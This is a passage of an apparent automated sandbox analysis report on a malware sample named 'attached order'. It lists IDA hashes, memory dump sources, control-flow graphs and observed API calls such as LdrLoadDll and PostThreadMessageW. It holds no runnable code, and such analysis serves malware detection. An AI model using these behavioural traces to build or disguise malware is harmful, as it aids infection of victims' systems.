                                                                                          • API String ID:
                                                                                          • Opcode ID: 8cf65d505e164c2cace15bac6fa00f30c19dcb2023d9300492a5172f24f41f28
                                                                                          • Instruction ID: dae2af07a87065d88794da5da31fd848d085d7fd3c1adb8a69871aff69b023de
                                                                                          • Opcode Fuzzy Hash: 8cf65d505e164c2cace15bac6fa00f30c19dcb2023d9300492a5172f24f41f28
                                                                                          • Instruction Fuzzy Hash: 4BB0123A2DC208B5DE0033644FE1D3B9431EFB2F00B905C05770900004C9704D34A22F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 415f269db87db9fe12674fdf24b9d5b6150aa5e81075c9874a2e1591874db375
                                                                                          • Instruction ID: 9843ee8c9019fe450428234e6d7c9b9b181d34164450d82e3aa550dd72b917b9
                                                                                          • Opcode Fuzzy Hash: 415f269db87db9fe12674fdf24b9d5b6150aa5e81075c9874a2e1591874db375
                                                                                          • Instruction Fuzzy Hash: 3DC0927044E380AFCB821F70C8A96957BB4EB0B29130444E2C85D9E06AD3A50D47DFB2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 430a873c7f4639865da8893205ec0dc4396c910c7607dd9bb2d920f3e9dfd690
                                                                                          • Instruction ID: dfec41a13ecc13acbca4199ad1169dd3f05bded98f4826b34e678d1eadba2106
                                                                                          • Opcode Fuzzy Hash: 430a873c7f4639865da8893205ec0dc4396c910c7607dd9bb2d920f3e9dfd690
                                                                                          • Instruction Fuzzy Hash: D49002662A454555B51871608D03A159411D6F17083549011271960144CAA09675803B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /z}
                                                                                          • API String ID: 0-2656037180
                                                                                          • Opcode ID: 19d7980efd9ae94587670ce71b15a992f3a6f211dcb0e35e5a23b63bc6255069
                                                                                          • Instruction ID: c9a871184a6244a02b6705f6444744446417a62883da44ec26d13f1de6502662
                                                                                          • Opcode Fuzzy Hash: 19d7980efd9ae94587670ce71b15a992f3a6f211dcb0e35e5a23b63bc6255069
                                                                                          • Instruction Fuzzy Hash: 81B1E974E1125ACFDB54DFA8D890A9EBBF2FF88300F208559D415AB359DB30A946CF90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0316f5604a65152c3df6ee12c6b61166a94a6465fcb18c413d6e3859b5f33f4a
                                                                                          • Instruction ID: 46351d8459058ce17b653431315cc0697491571c04507427d83235ab36566a33
                                                                                          • Opcode Fuzzy Hash: 0316f5604a65152c3df6ee12c6b61166a94a6465fcb18c413d6e3859b5f33f4a
                                                                                          • Instruction Fuzzy Hash: 70E13874E042198FDB14DFA9C9819AEBBB2FF89304F2481AAD415AB355D730AD42CF61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 39bc5cf6efb8f26e334cbf7396793a48a09baeae985609051e8ad87535138d2f
                                                                                          • Instruction ID: ba8002128b0fe591656de3884b8c90fa29934ca25626345edd3954b724aa07a0
                                                                                          • Opcode Fuzzy Hash: 39bc5cf6efb8f26e334cbf7396793a48a09baeae985609051e8ad87535138d2f
                                                                                          • Instruction Fuzzy Hash: 081286B8C02B458BE730CFA5E94C2997BB1BB45358F91430DD2626B2E9D7B8154BCF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5668f0317984abeb53b9bf171e2fc329e556bdcfd79a185e7c2b3356819e0919
                                                                                          • Instruction ID: 13ce5386bdf8ba688b0fa14793ee845741b3dc30dc4b36ff0d20196324db589b
                                                                                          • Opcode Fuzzy Hash: 5668f0317984abeb53b9bf171e2fc329e556bdcfd79a185e7c2b3356819e0919
                                                                                          • Instruction Fuzzy Hash: 64E11B74E042199FDB14DFA9C990AAEFBB2FF89305F2481A9D414A7355D730AD42CFA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ed2546f8c3aa861694db1542b03eef0dffa3fad8daa7f872b66740bbed216e4c
                                                                                          • Instruction ID: 0b54b55476f5f295598bf913ebf8dec9082a09d05d6a54ed40854b421068dbd4
                                                                                          • Opcode Fuzzy Hash: ed2546f8c3aa861694db1542b03eef0dffa3fad8daa7f872b66740bbed216e4c
                                                                                          • Instruction Fuzzy Hash: 6DE11874E042198FDB14DFA9C990AAEFBB2FF88305F2481A9D415AB355D730AD42CF61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1119310b780c1505b350fe0a7e486a64fe8e1f3c40b85e64a2964a2149d7f28
                                                                                          • Instruction ID: ee30df9eab0f2d565329257030b8448208bc531e7fc34864d5ea9e42d5131c8c
                                                                                          • Opcode Fuzzy Hash: c1119310b780c1505b350fe0a7e486a64fe8e1f3c40b85e64a2964a2149d7f28
                                                                                          • Instruction Fuzzy Hash: 8AE12974E042198FDB14DFA9C980AAEFBB2FF89305F2481A9D415AB355D730AD42CF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 531cac9c35faaf5d09dc0867a52a9d84862c63dc0f691abfef5eec0f8e13388c
                                                                                          • Instruction ID: 2d4f5a937bd999990d7db2d9f91ac2afa695ce98d7cb7cd5cde18662b7c9d9dd
                                                                                          • Opcode Fuzzy Hash: 531cac9c35faaf5d09dc0867a52a9d84862c63dc0f691abfef5eec0f8e13388c
                                                                                          • Instruction Fuzzy Hash: FFE12874E102298FDB14DFA8C581AAEFBB2FF89305F24816AD415AB315D730AD46CF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ac2f529c4455580b6704f65740cd9afe436151095598ad377f7a48395a1ca55
                                                                                          • Instruction ID: 666fa4079001a6cf34674c8e0c57f5b84abb48f6b0e0d8946399c0bccf0df4ca
                                                                                          • Opcode Fuzzy Hash: 5ac2f529c4455580b6704f65740cd9afe436151095598ad377f7a48395a1ca55
                                                                                          • Instruction Fuzzy Hash: 17A18E32E00209CFCF05DFB4C5458AEBBB2FF89304B15456AF912AB221EB31D956CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6875b3dbdb2401e9a270536e44cb0c8ebc0e1c66f407f9b56779bd5f04effeaa
                                                                                          • Instruction ID: 49023249eefa7c1d78af30b73add9ebee9c683fffef04fd980a4610bc4d80e22
                                                                                          • Opcode Fuzzy Hash: 6875b3dbdb2401e9a270536e44cb0c8ebc0e1c66f407f9b56779bd5f04effeaa
                                                                                          • Instruction Fuzzy Hash: 95B18275E016288FDB58DF6ADD44ADDBBF2BF88300F14C1A9D409AB365DB305A858F50
                                                                                          Memory Dump Source

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.4%
                                                                                          Dynamic/Decrypted Code Coverage:5.6%
                                                                                          Signature Coverage:8%
                                                                                          Total number of Nodes:162
                                                                                          Total number of Limit Nodes:14

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 238 417e43-417e6c call 42faf3 241 417e72-417e80 call 4300f3 238->241 242 417e6e-417e71 238->242 245 417e90-417ea1 call 42e563 241->245 246 417e82-417e8d call 430393 241->246 251 417ea3-417eb7 LdrLoadDll 245->251 252 417eba-417ebd 245->252 246->245 251->252
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                          • Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
                                                                                          • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                          • Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 281 42ce23-42ce5c call 404a23 call 42e053 NtClose
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                          • Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
                                                                                          • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                          • Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 11f712251ff3a6462a79f3741eb66c71527def8724a960a7170ba60b78c0ff86
                                                                                          • Instruction ID: cef2bc37c238c1ff82012d3d84a56300e569f15f98eb2d378e7844a214bb1c4f
                                                                                          • Opcode Fuzzy Hash: 11f712251ff3a6462a79f3741eb66c71527def8724a960a7170ba60b78c0ff86
                                                                                          • Instruction Fuzzy Hash: D79002312A500442D60076986508646500597E0301F91D525A5018555EC67588917132
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f60cf7234048e991b1cf9782e37e7d480ed9f069fe0079440151785f0c13adf6
                                                                                          • Instruction ID: c0d1591a8bd486bbca8c227d02286b82642bfab79346a4d8d8e3c835eba83ead
                                                                                          • Opcode Fuzzy Hash: f60cf7234048e991b1cf9782e37e7d480ed9f069fe0079440151785f0c13adf6
                                                                                          • Instruction Fuzzy Hash: 239002312A508842D6107258950474A500597D0301F95C925A4418658DC6A588917122
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 397944ba792f1baa5f08a56f9f04a5767bfd5ca4fbbeafc8ce0130a8c75ba594
                                                                                          • Instruction ID: dd3fe3b9ad5f87625c6fb94c2b9f5d3d6738d77a4dfffee133bfa581b731128c
                                                                                          • Opcode Fuzzy Hash: 397944ba792f1baa5f08a56f9f04a5767bfd5ca4fbbeafc8ce0130a8c75ba594
                                                                                          • Instruction Fuzzy Hash: CD9002612A600043460572585514616900A97E0201B91C535E1008590DC53588917126
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: a6a3c1a2118544bebc9b36ff63ad94100f54d56a35d8e2654f9fab50fcadc3ce
                                                                                          • Instruction ID: d60f74b4cc7c9919bf85f4fd2877d642d2c4781cb7d610c1136b8b850ac876f1
                                                                                          • Opcode Fuzzy Hash: a6a3c1a2118544bebc9b36ff63ad94100f54d56a35d8e2654f9fab50fcadc3ce
                                                                                          • Instruction Fuzzy Hash: 309002312A500453D61172585604707500997D0241FD1C926A0418558DD6668952B122
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 87f4b95504ca8878d4bb81c948d3ead8294716b0d750057819da0f62831deb4d
                                                                                          • Instruction ID: d6748b5ebe6458092fa19ffbd0f60ff73d146316130257904f4bb0c7f7b504a4
                                                                                          • Opcode Fuzzy Hash: 87f4b95504ca8878d4bb81c948d3ead8294716b0d750057819da0f62831deb4d
                                                                                          • Instruction Fuzzy Hash: 509002312A540442D6007258591470B500597D0302F91C525A1158555DC63588517572
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 84faf2d54b7ce410697eb8a53bd7f4e96547c73b2a7a503c32b73aaef3210f3f
                                                                                          • Instruction ID: 3feeb35fde9f4db7b14ab1fb89138f9db2307344ad1bebf3ef2ab746a0d50310
                                                                                          • Opcode Fuzzy Hash: 84faf2d54b7ce410697eb8a53bd7f4e96547c73b2a7a503c32b73aaef3210f3f
                                                                                          • Instruction Fuzzy Hash: 129002316A910442D60072585614706600597D0201FA1C925A0418568DC7A5895175A3

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 23 4145af-4145c9 24 4145cc-414607 23->24 25 414667-4146bd call 417e43 call 404993 call 425593 24->25 26 414609 24->26 43 4146dd-4146e3 25->43 44 4146bf-4146ce PostThreadMessageW 25->44 27 41460a-41460b 26->27 29 414637 27->29 30 41460d-41461f 27->30 29->27 32 414638-41463a 29->32 30->24 39 414621-414628 30->39 35 414644 32->35 36 41463c-414643 32->36 36->35 41 414635-414636 39->41 42 41462a-414633 39->42 41->29 42->41 44->43 45 4146d0-4146da 44->45 45->43
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                                                          • Instruction ID: 29e5b59ae817b40a0492b9d9877405cfbecd047df74ef541c8353dda1529c221
                                                                                          • Opcode Fuzzy Hash: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                                                          • Instruction Fuzzy Hash: 7531C1729062947BCB01DB759C42CDEBBA8EE9339871840AEED449B201D13E8D438BD5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 46 41464a-414685 call 42efb3 call 42f9c3 51 41468b-4146bd call 404993 call 425593 46->51 52 414686 call 417e43 46->52 57 4146dd-4146e3 51->57 58 4146bf-4146ce PostThreadMessageW 51->58 52->51 58->57 59 4146d0-4146da 58->59 59->57
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                          • Instruction ID: 8fda3ae30d1e02e1b48dbe91bdc2a1754cabd6a2c39bac0a93a85bd1a5eab231
                                                                                          • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                          • Instruction Fuzzy Hash: DD1106B1D4021C7EDB119AE58C81DEFBB7CDF453A8F41407AFA54A7141E2784E068BA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 60 414653-414665 61 41466d-414685 call 42f9c3 60->61 62 414668 call 42efb3 60->62 65 41468b-4146bd call 404993 call 425593 61->65 66 414686 call 417e43 61->66 62->61 71 4146dd-4146e3 65->71 72 4146bf-4146ce PostThreadMessageW 65->72 66->65 72->71 73 4146d0-4146da 72->73 73->71
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                          • Instruction ID: fd813871938eb91e280231b459abbd0e5037b6e28a91437a499ad31076d5f8c8
                                                                                          • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                          • Instruction Fuzzy Hash: 800104B1D0021C7ADB11AAE58C81DEFBB7CDF45398F408069FA44A7140E17C4E068BA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 254 417f0b-417f14 255 417ea6-417eb7 LdrLoadDll 254->255 256 417f16-417f1c 254->256 258 417eba-417ebd 255->258 257 417f1d 256->257 259 417f1e-417f2a 257->259 260 417f2c 259->260 261 417eec-417f00 260->261 262 417f2e-417f37 260->262 261->260 263 417f02-417f06 261->263 262->257 264 417f39-417f42 262->264 263->259 265 417f08 263->265 266 417f45-417fa1 264->266 267 417ecf-417ede 264->267 265->257 269 417ee0-417ee2 267->269 270 417eeb 267->270 270->261
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                          • Instruction ID: cee6ba3a713131cb16669297f14733702e208aa7074b7cb970d80753226a90f1
                                                                                          • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                          • Instruction Fuzzy Hash: 7AF02D32E88209CFDB00DF98DC45BD9B3B0FB56719F140ADAEA188B241D36555968B49

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 271 42d143-42d184 call 404a23 call 42e053 RtlAllocateHeap
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 276 42d193-42d1d7 call 404a23 call 42e053 RtlFreeHeap
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 286 42d1e3-42d21f call 404a23 call 42e053 ExitProcess
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 291 1772b2a-1772b2f 292 1772b31-1772b38 291->292 293 1772b3f-1772b46 LdrInitializeThunk 291->293
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Strings
                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017E8A06
                                                                                          • *** enter .cxr %p for the context, xrefs: 017E8B3D
                                                                                          • The critical section is owned by thread %p., xrefs: 017E89E9
                                                                                          • read from, xrefs: 017E8ADD, 017E8AE2
                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017E8AA6
                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017E8B6F
                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017E8944
                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017E89CB
                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017E89BF
                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 017E8ABF
                                                                                          • The instruction at %p referenced memory at %p., xrefs: 017E8A62
                                                                                          • *** enter .exr %p for the exception record, xrefs: 017E8B21
                                                                                          • an invalid address, %p, xrefs: 017E8AFF
                                                                                          • The resource is owned shared by %d threads, xrefs: 017E89AE
                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 017E8982
                                                                                          • Go determine why that thread has not released the critical section., xrefs: 017E89F5
                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017E890C
                                                                                          • The instruction at %p tried to %s , xrefs: 017E8AE6
                                                                                          • <unknown>, xrefs: 017E88AE, 017E8901, 017E8980, 017E89C9, 017E8A47, 017E8ABE
                                                                                          • *** Inpage error in %ws:%s, xrefs: 017E8A48
                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017E8AB4
                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017E8935
                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017E8953
                                                                                          • The resource is owned exclusively by thread %p, xrefs: 017E89A4
                                                                                          • write to, xrefs: 017E8AD6
                                                                                          • This failed because of error %Ix., xrefs: 017E8A76
                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017E8AAD
                                                                                          • *** then kb to get the faulting stack, xrefs: 017E8B4C
                                                                                          • a NULL pointer, xrefs: 017E8B10
